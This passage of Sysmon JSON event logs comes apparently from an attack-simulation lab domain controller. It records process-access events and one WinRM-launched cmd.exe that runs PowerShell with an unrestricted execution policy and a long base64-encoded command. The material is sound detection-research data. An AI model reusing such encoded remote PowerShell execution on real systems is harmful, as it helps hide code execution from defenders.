06:54:55.614","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4703,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4704,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4705,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.620\r\nProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010E8710600}\r\nProcessId: 3556\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nParentProcessId: 4184\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.620","ProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010E8710600}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","ParentProcessId":"4184","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4706,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nSourceProcessId: 4184\r\nSourceThreadId: 4412\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010E8710600}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","SourceProcessId":"4184","SourceThreadId":"4412","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010E8710600}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4707,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010E8710600}\r\nTargetProcessId: 3556\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010E8710600}","TargetProcessId":"3556","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
